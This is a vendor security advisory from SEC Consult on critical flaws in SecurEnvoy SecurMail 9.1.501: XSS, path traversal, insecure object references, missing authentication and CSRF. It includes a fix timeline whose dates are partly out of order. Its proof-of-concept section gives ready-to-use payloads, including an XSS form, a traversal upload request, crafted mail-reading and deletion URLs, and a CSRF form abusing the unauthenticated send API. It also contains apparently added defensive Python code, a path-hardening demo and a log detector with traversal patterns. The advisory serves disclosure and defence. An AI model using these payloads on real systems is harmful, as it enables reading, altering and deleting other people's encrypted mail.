"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities"

Author: SEC Consult
Platform: aspx
Release date: 2018-03-13

SEC Consult Vulnerability Lab Security Advisory < 20180312-0 >
=======================================================================
              title: Multiple Critical Vulnerabilities
            product: SecurEnvoy SecurMail
 vulnerable version: 9.1.501
      fixed version: 9.2.501 or hotfix patch "1_012018"
         CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704,
                     CVE-2018-7705, CVE-2018-7706, CVE-2018-7707
             impact: Critical
           homepage: https://www.securenvoy.com/
              found: 2017-11
                 by: W. Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Sending and receiving encrypted emails is not an easy or simple experience.
Businesses rely on email with an increasing amount of sensitive data sent across
their networks. A revolutionary approach that doesn't suffer from the overheads
of deployment and encryption management; just rock-solid security to give you
100% confidence in your business communications."

URL: https://www.securenvoy.com/products/securmail/key-features.shtm


Business recommendation:
------------------------
During a brief crash test of the SecurEnvoy SecurMail application several severe
vulnerabilities have been identified that break the core security promises of
the product.

These vulnerabilities open the possibility for several different attack
scenarios that allow an attacker to read other users' encrypted e-mails and
overwrite or delete e-mails stored in other users' inboxes.

As we have identified several critical vulnerabilities within a very short time
frame we expect numerous other vulnerabilities to be present.

As other SecureEnvoy products (besides the analyzed SecurMail) appear
to be highly integrated (all products are installed with a single setup
file) we suspect other components to also suffer from severe security deficits.

We recommend not using SecurEnvoy products (especially SecurMail) in a
production environment until:
* a comprehensive security audit has been performed and
* state of the art security mechanisms have been adopted.


Vulnerability overview/description:
-----------------------------------
1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707)
SEC Consult did not find any functionality that encodes user input when creating
HTML pages. Therefore persistent and reflected cross site scripting attacks are
possible throughout the application.

Some pages fail to properly decode URL encoded parameters. Because of this, cross
site scripting cannot be exploited on these pages in most browsers.


2) Path Traversal (CVE-2018-7705, CVE-2018-7706)
SEC Consult did not find any path traversal checks throughout the application.
Since the application uses encrypted files as the primary method of data
storage, this vulnerability can be exploited at several points.

Using this vulnerability, a legitimate recipient can read mails sent to other
recipients in plain text!


3) Insecure Direct Object Reference (CVE-2018-7704)
Authorization checks are only partially implemented. This allows a legitimate
recipient to read mails sent to other users in plain text.


4) Missing Authentication and Authorization (CVE-2018-7702)
In order to send encrypted e-mails a client does not need to authenticate on the
SecurEnvoy server. Therefore anyone with network access to the server can
arbitrarily send e-mails that appear to come from an arbitrary sender address.

Moreover, an attacker with network access to the server can re-send previous
communication to arbitrary recipients. This allows him/her to extract all
e-mails stored on the server. An attacker could also modify arbitrary messages
stored on the server.


5) Cross Site Request Forgery (CVE-2018-7701)
SEC Consult did not find any protection against cross site request forgery. An
attacker could use this vulnerability to delete a victim's e-mail or to
impersonate the victim and reply to his/her e-mails.


Since these vulnerabilities were found during a very short time frame, SEC
Consult believes that the product may contain a large number of other security
vulnerabilities. As already several core security promises have been broken
during this short crash test, no further tests were conducted.


Proof of concept:
-----------------
1) Cross Site Scripting
a) The following HTML fragment demonstrates reflected cross site scripting
   (CVE-2018-7703):

--- snip ---
<form action="http://<host>/secmail/getmessage.exe" method="POST"
    enctype="text/plain">
  <input type="hidden" name="mailboxid"
    value=""><script>alert&#40;&apos;xss&apos;&#41;<&#47;script>" />
  <input type="submit" value="Submit request" />
</form>
--- snip ---

b) E-mails that are sent using the HTML format can contain any <script> tags
   (CVE-2018-7707). These are executed once the victim opens the message in the
   web interface.


2) Path Traversal
a) The following request demonstrates how the message body of the e-mail with id
   107 can be overwritten while uploading the body for message 103. The message
   IDs can easily be guessed since they are assigned sequentially
   (CVE-2018-7705).

--- snip ---
POST /secupload2/upload.aspx HTTP/1.1
Host: <host>
Content-Type: multipart/form-data; boundary=--------822119548
Content-Length: 309

----------822119548
Content-Disposition: form-data; name="FileName"

x
----------822119548
Content-Disposition: form-data; name="MessageID"

103
----------822119548
Content-Disposition: form-data; filename="../107/BODY"
Content-Type: application/octet-stream

some message
----------822119548--
--- snip ---

b) The following link demonstrates how the message body of the e-mail with id
   107 can be retrieved while only having access to the mail with id 103
   (CVE-2018-7706):

http://<host>/secmail/getmessage.exe?mailboxid=<mailbox-id>&action=attachment&option1=103&option2=../107/BODY
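The root cause in 2a and 2b is a file name taken straight from the request and joined under the message directory with no normalisation or containment check. As an added illustration (not SecurEnvoy's code; the `<id>/BODY` on-disk layout, the temporary storage root and the function names are assumptions derived from the advisory's `../107/BODY` payload), here is that unsafe join next to a hardened resolver that rejects the PoC:

```python
import os
import re
import tempfile

# Constructed storage layout mirroring the "<id>/BODY" structure implied by the
# advisory's "../107/BODY" payload. This is an assumption, not the real product layout.
STORAGE_ROOT = tempfile.mkdtemp(prefix="securmail-demo-")
for msg_id in ("103", "107"):
    os.makedirs(os.path.join(STORAGE_ROOT, msg_id), exist_ok=True)
    with open(os.path.join(STORAGE_ROOT, msg_id, "BODY"), "w") as fh:
        fh.write(f"body of message {msg_id}\n")


def unsafe_message_path(message_id: str, name: str) -> str:
    """The pattern the advisory describes: the caller's message id and file name
    are joined directly, so name="../107/BODY" escapes the 103 directory."""
    return os.path.join(STORAGE_ROOT, message_id, name)


class TraversalRejected(ValueError):
    pass


_ID_RE = re.compile(r"^[0-9]{1,12}$")
_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def safe_message_path(message_id: str, name: str) -> str:
    """Hardened resolver: allow-list both parameters, then verify that the
    canonicalised result still lies inside the intended message directory."""
    if not _ID_RE.match(message_id):
        raise TraversalRejected(f"bad message id: {message_id!r}")
    # The allow-list contains no '/' or '\\'; "." and ".." are excluded explicitly.
    if not _NAME_RE.match(name) or name in (".", ".."):
        raise TraversalRejected(f"bad file name: {name!r}")
    msg_dir = os.path.realpath(os.path.join(STORAGE_ROOT, message_id))
    target = os.path.realpath(os.path.join(msg_dir, name))
    # Containment check on the resolved path; this also catches symlinks that
    # point out of the message directory.
    if os.path.commonpath([msg_dir, target]) != msg_dir:
        raise TraversalRejected(f"path escapes message directory: {target}")
    return target


def read_body(message_id: str, name: str, resolver=safe_message_path) -> str:
    with open(resolver(message_id, name)) as fh:
        return fh.read().strip()


if __name__ == "__main__":
    # Recipient of 103 asks for "../107/BODY", as in the advisory's PoC link.
    print("unsafe:", read_body("103", "../107/BODY", unsafe_message_path))
    try:
        read_body("103", "../107/BODY")
    except TraversalRejected as exc:
        print("safe  :", exc)
```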


3) Insecure Direct Object Reference (CVE-2018-7704)
The functionality that allows a recipient to read an e-mail checks whether the
user is actually authorized to read the requested e-mail. However, by using the
functionality that allows a user to reply to an e-mail, an attacker can
manipulate the id that is sent as a URL parameter to read arbitrary e-mails.
The following link demonstrates the retrieval of the message with id 103. The
message id can easily be guessed since they are assigned sequentially.

http://<host>/secmail/getmessage.exe?mailboxid=<mailboxid>&action=reply&option1=103
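For defenders, the traversal in section 2 and the sequential-id abuse in section 3 both leave a recognisable trace in the web server log. The following detector is an added example and not part of the advisory; the W3C-style log format and the sample lines are constructed to mirror the PoC requests, and the enumeration threshold is an arbitrary assumption:

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote

# Constructed W3C/IIS-style log lines (an assumption, not real product logs) that
# mirror the advisory's PoC requests. Field order used here:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2018-03-12 10:00:01 10.0.0.5 GET /secmail/getmessage.exe mailboxid=abc123&action=view&option1=103 200
2018-03-12 10:00:07 10.0.0.5 GET /secmail/getmessage.exe mailboxid=abc123&action=attachment&option1=103&option2=../107/BODY 200
2018-03-12 10:00:09 10.0.0.5 GET /secmail/getmessage.exe mailboxid=abc123&action=attachment&option1=103&option2=..%2F108%2FBODY 200
2018-03-12 10:01:00 10.0.0.9 GET /secmail/getmessage.exe mailboxid=zzz999&action=reply&option1=104 200
2018-03-12 10:01:01 10.0.0.9 GET /secmail/getmessage.exe mailboxid=zzz999&action=reply&option1=105 200
2018-03-12 10:01:02 10.0.0.9 GET /secmail/getmessage.exe mailboxid=zzz999&action=reply&option1=106 200
2018-03-12 10:01:03 10.0.0.9 GET /secmail/getmessage.exe mailboxid=zzz999&action=reply&option1=107 200
2018-03-12 10:02:00 10.0.0.12 GET /secmail/getmessage.exe mailboxid=qqq111&action=view&option1=110 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")
# A ".." path segment, with either slash direction, after decoding.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
ENUM_THRESHOLD = 3  # distinct message ids per client+mailbox before flagging (assumed)


def parse_line(line):
    """Split one log line into a record; returns None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    date, time, ip, method, stem, query, status = m.groups()
    # parse_qs percent-decodes once; the extra unquote also catches double-encoded
    # variants such as %252e%252e.
    params = {k: unquote(v[0]) for k, v in parse_qs(query, keep_blank_values=True).items()}
    return {"ts": f"{date} {time}", "ip": ip, "stem": stem, "params": params, "status": int(status)}


def detect(log_text):
    """Return alert tuples (timestamp, client ip, kind, detail)."""
    alerts = []
    seen_ids = defaultdict(set)  # (ip, mailboxid) -> distinct option1 values seen
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or not rec["stem"].lower().endswith(("getmessage.exe", "upload.aspx")):
            continue
        p = rec["params"]
        for key, val in p.items():
            if TRAVERSAL_RE.search(val):
                alerts.append((rec["ts"], rec["ip"], "path-traversal", f"{key}={val}"))
        # reply/attachment/delete take a message id directly; count distinct ids per
        # client and mailbox to spot sequential guessing of the kind the advisory describes.
        if p.get("action") in ("reply", "attachment", "delete") and "option1" in p:
            bucket = (rec["ip"], p.get("mailboxid", ""))
            seen_ids[bucket].add(p["option1"])
            if len(seen_ids[bucket]) == ENUM_THRESHOLD:
                alerts.append((rec["ts"], rec["ip"], "message-id-enumeration",
                               f"mailboxid={bucket[1]} ids={sorted(seen_ids[bucket])}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```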


4) Missing Authorization (CVE-2018-7702)
In order to send an e-mail to a recipient the following requests have to be
made:
 1. Execute a GETINFO request in order to request a message id.
 2. Upload the message body and the attachments.
 3. Execute a STORE request to send the message to the recipients.

None of these requests requires authentication, so no authorization check is
performed either. Attack scenarios include:
a) Extract any message by executing step #3 while specifying an own e-mail
   address as recipient and the message id to extract.
b) Overwrite attachments or message bodies of previously sent e-mails by
   executing step #2 to upload arbitrary content.


5) Cross-Site Request Forgery
SEC Consult did not find any CSRF protection within the web interface. Moreover,
CSRF attacks are possible against the API used to send e-mails. Since this API
does not require authentication, being authenticated on the server is not a
precondition for a successful attack. Instead, the attack exploits the victim's
network location.

a) The following link demonstrates how e-mails can be deleted using a CSRF
   attack (CVE-2018-7701):

http://<host>/secmail/getmessage.exe?mailboxid=<mailboxid>&action=delete&option1=103

b) The following HTML fragment demonstrates how the API can be exploited to send
   an e-mail with an arbitrary message id to an arbitrary recipient (also
   CVE-2018-7702):

<form action="http://<host>/secserver/securectrl.exe" method="POST"
    enctype="text/plain">
 <input type="hidden"
 name="FLAG&#58;STORE&#13;&#10;VERSION&#58;1&#46;0&#13;&#10;RECIPIENT&#95;MOBILE&#95;LIST&#58;SMTP" value="bob&#64;local&#58;MOBILE&#61;00000&#13;&#10;SENDER&#58;me&#64;local&#13;&#10;RECORDED&#95;DELIVERY&#58;&#13;&#10;SUBJECTB64&#58;AAAA&#13;&#10;MESSAGEID&#58;108&#13;&#10;SENDERMOBILE&#58;000000&#13;&#10;REPLY&#58;False" />
 <input type="submit" value="Submit request" />
</form>


Vulnerable / tested versions:
-----------------------------
The version 9.1.501 was found to be vulnerable. This was the latest version at
the time of discovery.


Vendor contact timeline:
------------------------
2017-11-20: Contacting vendor through info <at> securenvoy <dot> com
2017-11-21: SecurEnvoy requests to upload advisory through their SecurMail
            instance
2017-11-22: Uploading advisory to SecurEnvoy's SecurMail instance
2017-12-13: SecurEnvoy: engineering team is investigating issues;
            product will be re-engineered; asked for deadline extension until
            revised software is available
2017-11-15: Postponing advisory release to 2017-02-21
2018-01-22: SecurEnvoy sends release notes document for the security patch
            "1_012018"; Fixed vulnerabilities: Path traversal, Insecure Direct
            Object Reference, XSS, CSRF; SecurEnvoy instructs customers to
            configure requiring client certificates for the "secserver" endpoint
2018-02-22: Asking whether the security patch has been released
2018-03-01: Asking for status update
2018-03-01: SecurEnvoy: patch has been released
2018-03-12: Releasing security advisory


Solution:
---------
Customers of SecurEnvoy should immediately apply the security patch "1_012018"
or update to version 9.2.501 of the software.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Ettlinger / @2018